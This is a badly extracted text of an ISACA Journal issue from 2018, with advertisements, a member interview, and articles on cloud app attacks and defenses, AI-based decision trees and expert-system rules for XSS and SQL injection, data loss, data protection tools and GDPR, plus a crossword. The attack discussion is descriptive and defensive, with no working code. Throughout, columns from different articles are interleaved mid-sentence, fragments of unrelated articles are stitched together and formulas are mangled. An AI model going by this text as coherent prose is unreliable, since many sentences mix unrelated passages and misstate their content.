CISA MAnual
CISA MAnual
CISA MAnual
G E T A H E A D.
www.isaca.org/GetCertified-Jv1
Register
EARLY — to —
6th Annual
SAVE
European
Compliance & Ethics Institute
25–28 March 2018 | Frankfurt, Germany
• Hear from top compliance & ethics professionals from Europe and
around the world
• earn the latest and best solutions for compliance & ethics challenges,
L
including anti-corruption, data protection, and risk management
• arn the continuing education units you need, and take the Certified
E
Compliance & Ethics Professional - International (CCEP-I)® exam
EuropeanComplianceEthicsInstitute.org | lizza.catalano@corporatecompliance.org
Journal The ISACA® Journal
seeks to enhance
the proficiency and
competitive advantage
of its international
3 42 readership by providing
Information Security Matters: Managing The Machine Learning Audit—CRISP-DM
Availability in the Multi-Modal Era Framework managerial and
Steven J. Ross, CISA, CISSP, MBCP Andrew Clark
technical guidance from
experienced global
6 48
IS Audit Basics: Backup and Recovery Implementation of Big Data in Commercial Banks authors. The Journal’s
Ian Cooke, CISA, CGEIT, CRISC, COBIT Assessor Adeniyi Akanni, Ph. D., CISA, CRISC, ITIL noncommercial,
and Implementer, CFE, CPTE, DipFM, ITIL
Foundation, Six Sigma Green Belt peer-reviewed articles
PLUS
focus on topics critical to
10 52 professionals involved
Tools: Data Protection Tools
The Network in IT audit, governance,
Ed Moyle
Sandy Fadale, CRISC, CISM, CGEIT
security and assurance.
FEATURES 54
HelpSource Q&A
13 Sunil Bakshi, CISA, CRISC, CISM, CGEIT, ABCI,
Cloudifying Threats—Understanding Cloud App AMIIB, BS 25999 LI, CEH, CISSP, ISO 27001 LA,
Attacks and Defenses MCA, PMP
Aditya K. Sood, Ph.D., and Rehan Jalil
56
23 Crossword Puzzle
Mistakes Happen! Mitigating Unintentional Myles Mellor
Data Loss
(日本語版も入手可能 ) 57
Mike Van Stone, CISA, CISSP, CPA, and Ben Halpert CPE Quiz
Prepared by Kamal Khan CISA, CISSP, CITP, MBCS
30
Applying AI in Application Security S1-S4
Kiran Maraju, CEH, CISSP ISACA Bookstore Supplement
Read more from these
Journal authors...
37
Big Data Deidentification, Reidentification and
Anonymization Journal authors are
(日本語版も入手可能) now blogging at
Mohammed J. Khan, CISA, CRISC, CIPM
www.isaca.org/journal/
blog. Visit the ISACA
Journal blog, Practically
Speaking, to gain
Online-Exclusive
Features
practical knowledge
from colleagues and to
participate in the growing
ISACA® community.
Do not miss out on the Journal’s online-exclusive content. With new content weekly through feature articles
and blogs, the Journal is more than a static print publication. Use your unique member login credentials to
access these articles at www.isaca.org/journal.
Online Features
The following is a sample of the upcoming features planned for January and February 2018.
Auditing Big Data in the Enterprise Toward Encrypted and Private When What Is Lost Is Lost Forever
Joshua McDermott, CISA, CEH, Databases William Emmanuel Yu, Ph.D., CRISC, 3701 Algonquin Road,
CISSP, PMP Josh Joy CISM, CISSP, CSSLP
Suite 1010
Rolling Meadows, Illinois
60008 USA
Telephone
Discuss topics in the ISACA® Knowledge Center: www.isaca.org/knowledgecenter
Follow ISACA on Twitter: http://twitter.com/isacanews; Hashtag: #ISACA +1.847.660.5505
Follow ISACA on LinkedIn: www.linkedin.com/company/isaca Fax +1.847.253.1755
Like ISACA on Facebook: www.facebook.com/ISACAHQ
www.isaca.org
20TH ANNIVERSARY
INFORMATION
SECURITY MATTERS
RENEW THE
QUICK, SECURE AND
EASY WAY TODAY
Completing your renewal online is
the fastest, most convenient way
to renew your membership
and/or certifications, update your profile
and report CPEs all in one place.
2018GRC
Where Governance and Risk Management Align for Impact
AUG. 13-15, 2018 | NASHVILLE, TN, USA | EARN UP TO 18 CPE CREDITS
www.isaca.org/GRC18-jv1
Building Tomorrow’s
Leaders, Today
Q: How do you think the Q: What leadership skills your growth and your
role of the information do you feel are critical mentored relationship. It
security professional is for professionals to be may be awkward at first,
changing or has changed? successful in the field of but let the relationship
information security? develop organically. As the
A: It has long been said relationship grows and you
that employees are the A: I believe analytical skills are being challenged, do
biggest threat, but I do are critical for information not run away.
not believe that has ever security professionals.
been so true as it is now. Analytical skills refer to Q: What advice do you
I believe information risk the ability to collect and have for information
management is one of analyze information, solve security professionals
the most important skills problems, and make as they plan their career
a security professional decisions. These strengths paths and look at the
needs to possess today can help increase and future of information
to provide value. From benefit an organization’s security?
small start-ups to large productivity.
organizations, information A: This is not a cut-and-
assets are leaving our Employers look for dried topic. It is extremely
organizations and the employees who use clear, complex and usually
ability to understand logical steps and excellent depends on a combination
where they are and how to judgment to understand of technical skills,
secure them is extremely an issue from all angles nontechnical skills and
challenging. before executing an action. personal interest. I do not
believe that just anyone
Gone are the days we There are five skills that fall can be a technical security
would issue edicts under analytical skills that professional. One must
(back in the late 1980s I believe are important to understand networking,
and ‘90s). We are now master: communication, route switching, common
advisors and we need to creativity, critical thinking, hacking techniques
understand governance data analysis and research plus many other areas.
and compliance, privacy, capabilities. I have built my career
metrics and data analytics, on the people, process,
Sandy Fadale, CRISC, CISM, CGEIT as well as business Q: What is the best way governance and risk
Is a senior security consultant with Mariner Security consulting skills. for someone to develop management side of
Solutions. She has more than 25 years of in-depth IT those skills? the house. So, those
experience in the field of enterprise computing with Protecting information, no starting a career must
an emphasis on information security, which includes matter where it is located, A: Having a mentor to really understand which
IT security, application development and business requires a different way teach you how to fine- path they want to take:
continuity. Prior to Mariner Security Solutions, Fadale of thinking. Information tune analytical skills is the super-cool “How do
was a senior manager at Bell Aliant, a manager with security professionals who really helpful. Do not feel hackers think?” technical
Ernst & Young LLP, and a manager with Visteon are used to concentrating as though you have ever side or the governance,
on technology need to mastered this area. Always risk and compliance side.
Corporation in its information security and risk
change their focus to continue to refine it.
advisory practices. She also served in the US military
business processes and How people gain
in telecommunications, utilizing various encryption data. Cloud computing But how do you go about knowledge is as individual
techniques. She has been the president of the ISACA® and mobile devices are selecting a mentor? Find as the individual. For
Atlantic Provinces Chapter since 2008. Fadale controlling this evolution; someone to emulate, example, you can go to
teaches Certified in Risk and Information Systems they are requiring that and study that person. university and specialize.
Control™ (CRISC™), Certified Information Security security professionals Then ask him/her to be Once university is
Manager® (CISM®), and Certified in the Governance of spend more time on a mentor. Ensure that completed and you are in
Enterprise IT® (CGEIT®) certification review courses governance and providing the person understands a junior role, you can then
and is a subject matter expert who has assisted in advice to organizations the area in which you pursue certification (and
the creation of the 2012, 2013 and 2014 editions of than on direct operational want to grow and why there are many of those).
responsibilities for cloud you chose him/her. That said, however, just
the ISACA CRISC® Review Manual.
and mobile environments. Continuously evaluate having a certification
2
make an effective careers. position happened to
security professional. I come up in 1989 and I took What are your three goals for 2018?
worry that recruiters and Organizations need to it. The rest is history. •O btain my Certified Information Systems
human resources (HR) retain employees as
Auditor® (CISA®) certification
departments often rely too the opportunities for I think I was shaped by the
heavily on paper-based switching jobs for more military in my discipline •B uild Mariner Security Services (MSS) Training
qualifications, given the money are numerous and respect for people. product line into a well-respected training
pressing need to fill open in this field. Retention I was raised that your offering in Atlantic Canada
positions. techniques include word is everything and a • Help grow the MSS business
providing opportunities for handshake is binding, and
Information security as continuing education and the military reinforced that.
a career choice is hugely
rewarding. Regardless
professional development
and setting a clear path for Q: What has been your 3 What is your favorite blog?
Krebs on Security @briankrebs
of the discipline chosen, development. biggest workplace or
security requires life-long career challenge and how
4
learning and constant Information security did you face it?
change. Security professionals can work
What is on your desk right now?
professionals never together to begin to Working in a truly global
grow bored. make a difference in organization several years Coffee (decaffeinated), two monitors, wireless
the cyber security talent ago, I was faced with keyboard, wireless mouse and mouse pad, a
Q: What do you think are shortage. Efforts can understanding privacy light and my client notes notebook
the most effective ways to range from retraining laws, security laws and
regulations around the
5
address the cyber security existing employees, to
skills gap and, especially, recruiting high schoolers globe. Security policies
the lack of women in the into specific educational could not be written at Who are you following on Twitter?
cyber security workspace? pathways, to bringing a parent company and Green Party Canada, Digital Forensics, Peter
together the government pushed out to its affiliates Morin, Paul Jauregui, TrendLabs, Think Progress,
A: Part of the problem sector, private sector because countries’ laws Kaseya, The IoT, Dark Reading, among others
stems from the lack of and academia to share differed.
information about careers amazing opportunities for
in information security.
This issue traces its roots
all the way down to parents
employment and growth in
the ever-expanding field of
cyber security.
We had an incident in
Italy that we needed to
investigate. During the
6
How has social media impacted you
professionally?
It allows me to have the latest trends at
and school counselors investigation, I received my fingertips.
not knowing about the Q: You served in the US a call from our legal
full range of opportunities military. How did that department asking what I
or, at best, reducing the
field to looking only to
the specialty of hacking.
experience shape your
professional experience
as a civilian?
was doing, so I told them.
I was promptly advised
that Italy has some of the
7
What is your number-one piece
of advice for other information
security professionals, especially
Often, parents and strictest privacy laws in women?
students are told that A: When I was in the the world and I should
Be confident in what you know. There is a fine
the only way to follow a military in the late ‘70s, not be able to see what
security career path is to I got a taste of security I had seen. We ended line between assertion and aggression—do not
go through a traditional as I set up encrypted up building a small data cross it.
computer science communications channels center there so information
program or a networking using 16-bit encryption, would remain in-country.
program, then switch into
security. This may have
and I knew this was the
career for me. Security I had to update the policies 8
What do you do when you are not at
work?
been the reality 10 years was not a “thing” after to better reflect the laws Spend time with my wife outdoors, camping,
ago, but it is no longer I got out of the military around the world. playing Pickleball and practicing yoga
the case: An increasing as a disabled veteran in
number of schools are 1980. However, in 1986, I
offering graduate and went back to school and
even undergraduate graduated with a computer
REGISTER TODAY AT
WWW.ISACA.ORG/TRAINING2018
P R E PA R E F O R Y O U R N E X T R O L E , N O W.
Gain new tools and techniques as you advance or refresh your knowledge.
ISACA ISACA/DELOITTE
TRAINING COURSES TRAINING COURSES
TUITION: TUITION:
ISACA Members US $2,295 | Non-Members US $2,495 ISACA Members US $2,495 | Non-Members US $2,695
CISM Bootcamp: 4-day Exam Prep Cloud Computing: Seeing through the Clouds—
COBIT 5: Strategies for Implementing IT Governance What the IT Auditor Needs to Know
Fundamentals of IS Audit & Assurance Internal Audit Data Analytics & Automation
Cloudifying Threats
Understanding Cloud App Attacks and Defenses
Cloud applications (apps) and services have accessing and transmitting the enormous flow
revolutionized business productivity and efficiency by of confidential data to and among different cloud Do you have
providing a robust and flexible environment in which apps. To determine this, enterprises must first gain something
to share and transfer data. Businesses are becoming visibility into all cloud apps being accessed by their to say about this
more dependent on the cloud as the trend of adopting network users before trying to understand the risk article?
cloud apps is growing at an exponential rate. End that malware and user activity pose to confidential
users do not have a choice, as cloud apps are being company data. Visit the Journal
shipped to them as default software in the hardware pages of the ISACA®
website (www.isaca.
devices. For example, mobile devices are shipped with Cloud apps have faced a wide variety of threats
org/journal), find the
default cloud apps. Additionally, enterprise cloud apps over the last couple of years. Google Drive has article and click on
are being used as storage solutions to host, manage been hit by a number of phishing attacks where the Comments link to
and share data. That being said, every technology is HTML/JavaScript(JS)2 and OAuth3 functionalities share your thoughts.
susceptible to abuse and exploitation, and cloud apps were abused to steal user account credentials.
are no exception. Dropbox, OneDrive and other cloud apps have http://bit.ly/2k6sIQ1
been used to distribute malware4, 5 to user
Hackers and agents of foreign nations are increasingly systems. Configuration errors in cloud storage
exploiting cloud apps to perform nefarious operations apps such as Amazon Web Services (AWS)
that could potentially result in significant financial have led to unintentional data exposure, causing
losses and compliance-related fines, in addition to security breaches that severely impacted affected
loss of reputation to individuals and enterprises alike. organizations. Data leakage via AWS buckets6, 7 is
a grave threat to enterprises, as a small error could
Before trying to understand potential cloud threats, result in broad exposure of sensitive data. Finally,
IT departments need to have complete visibility inherent design and security issues in cloud apps8
into the channels through which data flow between have been regularly exploited by hackers to execute
users and cloud apps that exist outside of the large-scale exploits. Overall, threats to cloud apps
network and perimeter security defenses. While are real and enterprises must fully understand them,
the threats posed by shadow IT and shadow data1 the potential impact to their business, and how to
are real and persistent, enterprises are not staffed defend against attacks on cloud apps to protect
or equipped to determine how their users are user confidentiality and compliance-related data.
–P
hishing pages deployed as attachments— • Man-in-the-browser (MitB) attacks—MitB attacks
Attackers can abuse the functionality of data are advanced exploits in which end-user systems
URLs supported by their browser. It is possible are first infected with sophisticated malware, such
to encode data in a “data:text/html” handler, and as a bot, which is then enabled to perform advanced
when allowed to open in the browser’s address operations in the compromised system. The bot
bar, it renders the content. Attackers are using actually snoops communication taking place
this trick to encode phishing web pages in the between the user’s browser and the cloud app.
data handler and pass them as attachments
in phishing emails. When the user opens the Figure 3—Phishing Web Page for Office 365
attachment, the content (data handler) is opened Account Deployed on Noncloud App Domain
in the browser address bar and it renders the
decoded phishing web page. Figure 2 shows an
example of this variant.
–P
hishing pages deployed on noncloud app
domains—This is the most widely used phishing
technique, in which web pages of legitimate
cloud apps are cloned, updated and deployed
on noncloud app domains. Attackers select a
domain that may look legitimate but is not.
These attacks are executed in conjunction with
social-engineering tactics to trick users into
revealing their cloud app credentials. Figure 3
shows an example of a phishing attack in which
a web page similar to the official login page for
Office 365 is deployed on the non-cloud
app domain.
The bot injects unauthorized code into the browser Malware Distribution
process and logs the cloud app credentials entered
by the user. This attack is different from a standard Cloud app storage functionality has been abused
keylogging attack, as the attack model is different. by attackers to distribute malicious files to end
MitB attack mode is currently deployed in a majority users. Malware is distributed through the cloud
of botnets. Figure 4 shows the reverse-engineered when attackers use stealthy techniques to upload
code from a malware binary highlighting the malicious files on cloud apps or share malicious
“Pr_Write” function in the “NSPR4.DLL” library. The files publicly by configuring global access rights.
library is hooked by the bot to steal data entered by As a result, malicious files are now ready to be
the user in the HTML forms opened in the Mozilla shared with or distributed to end users by a cloud
Firefox browser. Primarily, the bot hooks the critical app’s URL. To infect end users, attackers can:
functions imported from the libraries in the browser • Distribute the direct cloud apps’ URLs that
process to dump the credentials in the HTTP GET/ reference malicious files to end users either by a
POST requests. third-party platform or via an embedded link in a
• Man-in-the-cloud (MitC) attacks—MitC10 attacks phishing email
are similar to MitB attacks. The difference is that • Conduct a stealthy drive-by download attack
tokens are stolen instead of account credentials. in which the cloud app URL that references a
Tokens are used heavily in cloud apps as malicious file is embedded in a third-party website
authentication mechanisms for transmitting data in an HTML iframe or obfuscated JavaScript.
to cloud app application program interfaces (APIs) When a user visits the third-party website, the
from authorized resources. Malware residing in cloud app URL is rendered in the browser, which
the end-user system is capable of hijacking the downloads the file onto the end user’s system.
communication channel. This is done by either Attackers can opt to use advanced techniques to
hooking the cloud agent functions or using perform this operation covertly.
social-engineering attacks to inject attacker-
supplied unauthorized synchronization tokens so Overall, the basic idea for attackers is to weaponize
that valid and unexpired tokens can be extracted cloud app storage functionality by using apps as
to gain access to users’ accounts. Primarily, the malware delivery platforms. Figure 5 shows a
MitC malware exploits the file synchronization malicious executable (MZ header) file (Zeus bot)
services for installing additional malware, exfiltrating successfully uploaded to Google Drive. Figure 6
data and performing command and control (C&C) shows malicious executables hosted on the AWS
operations. The attack method is different, but Simple Storage Service (S3) buckets.
the end result is the same: gaining access to user
accounts.
ISACA JOURNAL VOL 1 17
Figure 5—Malicious Executable File Successfully Uploaded on Google Drive
Data Exfiltration and Leakage because multiple instances have been noted where
sensitive data were disclosed via S3 buckets.
Data exfiltration is the process of stealing and
stealthily transmitting data from compromised • Users can upload files containing sensitive data
systems to unauthorized locations on the Internet. such as personally identifiable information (PII),
Since enterprise cloud apps store sensitive data in payment card industry (PCI) information, and
the cloud, they are vulnerable to security breaches protected health information (PHI) on cloud apps
that result in the leakage of data due to human error and share those files in an insecure manner with
or hackers. Data can be exfiltrated or leaked from other users.
the cloud apps in multiple ways, including: • Attackers can validate and verify sensitive files
• Users of enterprise cloud apps can share sensitive hosted in compromised cloud accounts and
documents with a broad audience by making exfiltrate the data by making those files public and
documents public through configuring access rights downloading them onto an unauthorized server,
in an insecure manner, e.g., sharing sensitive files and by sending files as attachments via emails
publicly via Google Drive, Box or other similar sharing using compromised user accounts.
sites. Amazon S3 buckets have been under the radar
There are a few critical points of GDPR that pertain Security breaches in cloud apps could be a result
to security. The most relevant articles related to of inherent cloud threats. As a result, enterprises
security in GDPR are: can suffer financial losses by failing to adhere
to compliance requirements. To avoid financial
• Article 33 of the GDPR details the requirements
repercussions, it is essential to combat threats
that need to be followed by data processors and
against cloud apps to provide a secure, safe and
controllers when implementing technical and
compliant environment.
security controls to ensure that data stay secure
and private. The controls must guarantee the
security, availability, confidentiality and integrity of Recommendations and Countermeasures
data, including system resiliency. The expectation The following are the recommended
is to achieve stable and secure systems with countermeasures essential to defending against
maximum availability. threats to cloud apps:
Figure 1—Top Five Issues in Investigated Cases Closed With Corrective Action
Year Issue 1 Issue 2 Issue 3 Issue 4 Issue 5
2015 Impermissible Safeguards Administrative Access Technical
Uses & Safeguards Safeguards
Disclosures
2014 Impermissible Safeguards Administrative Access Technical
Uses & Safeguards Safeguards
Disclosures
2013 Impermissible Safeguards Access Administrative Minimum
Uses & Safeguards Necessary
Disclosures
Source: Department of Health and Human Services Office for Civil Rights, “Top Five Issues in Investigated Cases Closed with Corrective Action, by Calendar
Year,” USA. Reprinted with permission.
End users can often be the root cause of data Malware and
Hacking, 356
losses. For example, the 2016 California Data 54%
Breach Report findings shown in figure 3 reflect
n=657 breaches
a common theme.18 The errors category, totaling
17 percent of the breaches between 2012 and
2015, represents incidents stemming from Source: Harris, K.; “California Data Breach Report 2012-2015,” California
anything insiders (employees or service providers) Department of Justice, USA, February 2016. Reprinted with permission.
and determining the best attribute according to this will check for output data validation and, if output
entropy and gain with algorithms such as Iterative data validation is not performed, it will check for data
Dichotomiser 3 (ID3).2 type and provide the outcome as attack success
(i.e., XSS attack is possible) or attack fail (i.e., XSS
The information gain (G), G(S,A) where A is an attack is not possible). For attack path P13, input
attribute and S is a sample of training examples data validation is performed with the decision-tree
outcome attack fail. This means that XSS is not
p+ is the positive examples in S
possible using the above training sets.
p- is the negative examples in S
• Entropy of S: Average optimal number of bits to Figure 3 is the XSS vulnerability decision tree.
encode information about certainty/uncertainty. Similar types of decision trees can be created
Entropy (E) is the minimum number of bits needed for various application security vulnerabilities to
to classify an arbitrary example as yes or no. correlate, identify and predict the security threats
once these decision trees are constructed for
Entropy(S) = -p+log2p+- p-log2p-
various security vulnerabilities. These decision
• Gain(S,A): Reduction in entropy after choosing support system rules can be leveraged as inference
attribute A rules for the application security expert systems.
Sv
Gain( S , A) = Entropy ( S ) Entropy ( S v )
v Values " A ! S
!
Application Security Expert Systems
Therefore, the entropy of the training data, E(S), can Expert systems are capable of interpreting the
be represented as E ([3+, 9-]) because out of the 12 provided input, advising and deriving a solution. They
training examples, three of them are attack success also provide suggested alternatives to the problem
and nine of them are attack fails. Figure 4 describes and predict the results. Figure 5 illustrates the
attack paths and their outcomes. components of an expert system—knowledge base
and inference engine. The knowledge base comprises
The previous attack paths are provided as training information that is factual and heuristic (guessable),
sets to the decision support system, and the input is including rules and facts. If-then-else rules are a part
passed through this decision-support system. This of the knowledge representation. Information acquired
is depicted in figure 3 as the XSS attack decision from security experts is fed to the expert systems in
tree. When the input data validation is not performed, the form of if-then-else rules to develop security expert
systems. Facts are the assertions.
Output
Validation S (3+, 9–) E = 0.81
Attack Fail
S (3+, 3–) E = 1
S (1+, 3–) E = 0.81 Gain (S, input) = 0.81 – 6/12*1 – 6/12*0 = 0.31
Gain (S, output) = 0.81 – 6/12*1 – 6/12*0 = 0.31
Gain (S, datatype) = 0.81 – 4/12*0.81 – 4/12*0.81 – 4/12*0.81= 0
Input Validation and Output Validation provides greater information gain
Attack Attack Attack than Data type, w.r.t. target classification
Success Success Success
Security Code Review Inference Engine— • Fact 4: X is passed through a database call.
Expert Systems Forward Chaining
The security code review inference engine with Rules
forward chaining3 can be used to predict values, i.e., • Rule 1: If X is a form parameter and X contains
deriving what can happen next. This will help the special characters, then X is a tainted input.
security code review engines to actually determine
the type of attack. Figure 6 details the SQL injection4 • Rule 2: If X is a URL parameter and X contains
vulnerability, with the forward chaining inference special characters, then X is a tainted input.
rules using if-then-else rules by matching the • Rule 3: If X is a cookie parameter and X contains
various conditions. special characters, then X is a tainted input.
SQL injection is a web application security • Rule 4: If X is a file import and X contains special
vulnerability where input data submitted to web characters, then X is a tainted input.
applications are not validated properly for malicious • Rule 5: If X is an HTTP header and X contains
inputs. Using SQL injection vulnerability attacks, special characters, then X is a tainted input.
attackers will inject malicious SQL commands to
the back-end database and exfiltrate database • Rule 6: If X is a tainted input and input is not
details. Figure 7 describes the security code review white-list input validation processed, then X is an
inference engine and forward chaining rules. unvalidated input.
Goal
Vulnerable pattern
matching rules fired
with the matched
vulnerability goal.
• Rule 7: If X is a tainted input and X is not used for diagnosis of the values, i.e., deriving what
blacklist input validation processed, then X is an happened. This application security remediation
unvalidated input. guidance expert system helps the developer to
determine various possible sub-goals (solutions) to
• Rule 8: If X is a tainted input and not an escaping
fix the vulnerabilities. Figure 9 describes backward
input, then X is an unvalidated input.
chaining expert systems that provide guidance for
• Rule 9: If X is an unvalidated input and X is security vulnerabilities with inputs as goals and facts
not processed in prepared statements (with and outcomes as possible matched sub-goals.
parameterized queries), then X is a potential SQL
injection input. Figure 10 details the application security
remediation guidance rules for SQL injection
• Rule 10: If X is an unvalidated input and X is
remediation vulnerability where rules 14, 15 and 16
passed through a database call, then X is a
will be sub-goals. These sub-goals can be treated as
potential SQL injection input.
possible solutions that a developer can implement
to remediate the SQL attack, i.e., escape the input
Figure 8 details the rules matching the current
or implement blacklist/white-list input validation for
working memory, conflict set, rule fired and the next
special characters.
cycle after a rule has fired.
Input Goal 1
(Goal and Facts) Inference Rule 1
Vulnerability 1— Inference Rule 2
User/ SQL Injection ~
Security Sub-Goal 1
Auditor
Goal 2
Output Vulnerability 2— Inference Rule 3
(Matched Cross-Site Scripting Inference Rule 4
Vulnerability ~
Sub-Goals) Sub-Goal 2
Sub-Goals
• Rule 12: If X is a potential SQL injection input, then • Rule 16: If X is an unvalidated input, then X is a
X is not processed in prepared statements (with tainted input and X is not white-list input validation
parameterized queries). processed (sub-goal).
• Rule 13: If X is a potential SQL injection input, then • Rule 17: If X is a tainted input, then X is from HTTP
X is passed through a database call. request header and X contains special characters.
• Rule 14: If X is an unvalidated input, then X is a • Rule 18: If X is a tainted input, then X is from file
tainted input and not an escaping input (sub-goal). import and X contains special characters.
• Rule 15: If X is an unvalidated input, then X is a • Rule 19: If X is a tainted input, then X is from
tainted input and X is not blacklist input validation cookie parameter and X contains special
processed (sub-goal). characters.
• Rule 20: If X is a tainted input, then X is from URL security expert systems. Training sets are
parameter and X contains special characters. incrementally developed to create hypotheses
to derive conclusions. The application security
• Rule 21: If X is a tainted input, then X is from
expert systems with forward and backward
parameter and X contains special characters.
chaining can also be used to determine the security
vulnerabilities, i.e., deriving consequences based on
Figure 11 details the rules matching the current
possible antecedents (matched rules), and can also
working memory, conflict set, rule fired and the next
be used for advising security vulnerability coding
cycle after a rule has fired.
remediation solutions to fix the vulnerabilities.
Pseudonymized Data
Make Sensitive Data Classify Data
ISACA AWARDS
C A L L F O R N O M I N AT I O N S
Have you read a thought-provoking article or seen a motivating speaker at an ISACA event?
Have you been inspired by the passion and leadership of an ISACA volunteer? Does your
chapter have dedicated leaders launching innovative new programs? ISACA needs your help
to recognize these outstanding achievements across our professional community and inspire
future contributions.
Nominations are due 31 January for the 2018 ISACA Global Achievement Awards and ISACA
Chapter Awards.
Visit www.isaca.org/awards for nomination forms, eligibility guidelines, and more details.
ALGORITHMIC MODELS 1 N (x − x )2
s= ∑ i
AND THEIR SUBSEQUENT N − 1i=1
Figure 2—Overfitting
x x x
Source: F. Pedregosa, et al. Reprinted with permission.
14
Definition
Training Identification
Ploughing Recognition
Analysis
through alternative channels, such as automated cannot be measured, then it cannot be controlled.
teller machines (ATMs) and mobile banking, where Each data source must be listed, although not all of
large chunks of data are exchanged. It will not them can be handled at once. Then, based on the
make any sense to want to treat all data from all defined scope, data from the identified sources can
fronts the same way and at the same time. It is be prepared for the next stage.
necessary for banks to define the scope of big
data implementation to be covered in order to get
meaningful information from the data.
EFFECTIVE DATA
Identification of Skill Set TRACKING AND
After developing a successful definition of MEASUREMENT STEM
boundaries in which to work, it is necessary to
identify human resources needed with the required FROM IDENTIFIED
skill set. Careful selection of manpower with the DATA SOURCES. IT HAS
requisite skills is very important before a successful
big data implementation. Banks should note that BEEN SAID THAT IF IT
this should not be seen as residing in only one CANNOT BE MEASURED,
department of the bank. Experienced staff should be
picked from operations, marketing, control and other THEN IT CANNOT BE
departments to contribute their input for successful CONTROLLED.
implementation. A rich blend of skilled people
will go a long way to determine the success of an
implementation.
Analysis of Output
Recognition of Data Sources
Analysis is the stage where data within the
Effective data tracking and measurement stem from scope are reviewed for relevant information for
identified data sources. It has been said that if it management use. Both structured and unstructured
2
(IaaS), and in application programming
interfaces (APIs) or other services
It should be stated explicitly that the for Platform as a Service (PaaS)
specifics of the data a given organization
Data Encryption implementations.
3
might wish to locate will vary based on
the organization itself. While discovery
There are also tools that help practitioners
and inventory of sensitive data are
encrypt data where the data are stored or
important regardless, the specifics of the
transmitted. It should be noted that there Exfiltration
data (and, therefore, the specific tools
are absolutely any number of special-
an organization might employ to find There are many tools that the
purpose encryption tools out there that
the data) are different based on the type organization may already have in place
can be directly employed or adapted to
of organizations are and the specific that can be used to detect and alert on
encrypt data at any level of the Open
considerations they have. potential exfiltration activity. Any
Systems Interconnection (OSI) stack—at
the application layer, at the file system network monitoring device (e.g., firewall
This means that tools that support or intrusion detection systems [IDS])
layer, for data in transit, etc. It is always
discovery and inventorying of data can can potentially be adapted to help
the better option to systematically and
directly assist practitioners in a few provide value for an exfiltration
holistically address encryption use,
ways: scenario. Firewalls or HTTP forward
applying it in combination with something
1. By helping them verify that other like a formalized threat modeling exercise proxies can be employed to look for
controls are performing as expected to protect against known, analyzed and suspicious outbound connections
2. By building out a “map” of where thought-through threat scenario. Such (e.g., entities that are on IP black lists).
sensitive data live throughout the systematic analysis is the ideal case. IDS devices can do this and also
organization potentially be adapted to trigger on
However, because the ideal case is custom regular expressions that might
Once this is complete, the tools can not always the actual case in every correspond to sensitive internal
also be run periodically in ad hoc organization, it is worth noting that information.
fashion to find and flag situations practitioners have data encryption options
where data have been stored or even in the absence of that broader One important thing to note is that,
transmitted to an unexpected location. investment. First and foremost, most for the purposes of exfiltration, many
modern operating systems have file attackers will employ encrypted
It should be noted that there are a few system encryption options built into them. channels such as Transport Layer
different categories of tools that can In combination with data discovery and a Security (TLS), Secure Shell (SSH)
help in this regard: reliable inventory, tools are often available or even nonstandard encrypted
natively on the operating system platform communications techniques.
• Commercial data discovery tools,
which assist organizations in finding, used within the enterprise. This includes
tools such as BitLocker (Windows), Therefore, while potentially a valuable
collecting and consolidating data
eCryptfs or LUKS (Linux), and others on addition, it cannot be assumed that an
stores for business intelligence or
a platform-by-platform basis. Likewise, IDS (monitoring, as it does, plaintext
advanced analytics purposes
database and middleware software can traffic) will necessarily always be able
• Data leak prevention (DLP) tools,
sometimes support encryption natively to detect this activity. As such, keeping
which can be used in an ongoing
within it. an eye out for suspicious connections
way to find and flag data that should
is a useful step, whether or not the
not be stored or transmitted through
Many cloud service provider (CSP) organization also employs an IDS to
certain channels based on business
storage and computing implementations detect exfiltration.
Do you have Q
The European Union (EU) General Data
Protection Regulation (GDPR) will take effect
in May 2018. My organization is not doing any
The new EU data protection regime extends the
scope of the EU data protection law to all foreign
organizations processing the data of EU residents. It
something
to say about this business in Europe currently, but we have plans to provides for a harmonization of the data protection
article? expand. How will GDPR affect us? Will it affect us if regulations throughout the European Union, thereby
we do not have an office in Europe? making it easier for non-European companies to
Visit the Journal comply with these regulations. However, this comes
A
pages of the ISACA® GDPR (Regulation [EU] 2016/679) is a at the cost of a strict data protection compliance
website (www.isaca. regulation by which the European Parliament, regime with severe penalties of up to 4 percent of
org/journal), find the the Council of the European Union and the European worldwide turnover or upper limit of £20 million,
article and click on Commission intend to strengthen and unify data whichever is higher.2
the Comments link to
protection for all individuals within the European
share your thoughts.
Union. It also addresses the export of personal data Some facts about GDPR include:3
outside the European Union for processing. The
http://bit.ly/2B0Ktus • If a business is not in the European Union, it
primary objective of the GDPR is to give assurance
still must to comply with the regulation if it is
to EU citizens that their personal data are processed
processing the personal data of EU citizens
in a secure environment and have adequate legal
outside the EU’s geographical boundaries.
protection. The regulation was adopted on 27 April
2016. It will be enforceable beginning on 25 May 2018 • The definition of “personal data” is broader,
after a two-year transition period. Unlike a directive, it bringing more data into the regulated perimeter.
does not require any enabling legislation to be passed
by national governments; thus, it is directly binding • Consent will be necessary for processing
and applicable. children’s data.
by Myles Mellor
www.themecrosswords.com
ACROSS
1 2 3 4 5 6 7
1. Type of shared site
6. Protocol for data transfer
8. Contract between service provider and end user
8 9 10 11
9. Berners-Lee invention
10. Sources of danger 12 13
12. Computer programming language for statistical
analysis, abbr. 14 15 16 17
13. Lawyer’s org.
18 19
14. Bit of binary code
15. Have legal control of 20 21 22 23 24
16. Incomprehensible
18. Milliliter, abbr. 25 26 27
19. Geometric art style
28 29 30 31 32
20. Spelling contest
22. Destroyed 33 34 35
25. Memory
26. Intersected 36 37 38 39
27. NASA term for a spacewalk, abbr.
40 41
28. Restoring a system after an attack or crash
31. Establish 42 43 44 45
32. CISAs work with this department during audits
33. Tick off
35. ___ standstill (motionless)
46 47
36. Mainframe component
37. Malicious software that demands payment
with a threat
40. Placed 17. Land areas
41. Web address ender 18. Office message
42. Early operating system 20. Data duplications for security
43. Single- prefix 21. Science of investigation of evidence found
44. Containing errors, as a file or system in computer systems
46. Making something known 23. Online party announcement
47. The heart of a Ted Talk 24. Information
25. Memo start
28. Diminished gradually
DOWN
29. The V in VM
1. Physical control 30. Historical chapter
2. Contract for temporary use 34. Agree
3. Arrangement of displays to monitor a system 35. Contended
4. Preeminent industrialist 38. Standalone malware computer program that
5. Period of time when a system is nonfunctioning replicates itself
6. Stop functioning, as a system 39. Flightboard abbreviation
7. Presented, as a problem 45. Drink that is served hot or cold
11. Create a new path for
Answers on page 58
TRUE OR FALSE
SATHIYAMURTHY ARTICLE BRADFORD AND HENDERSON ARTICLE
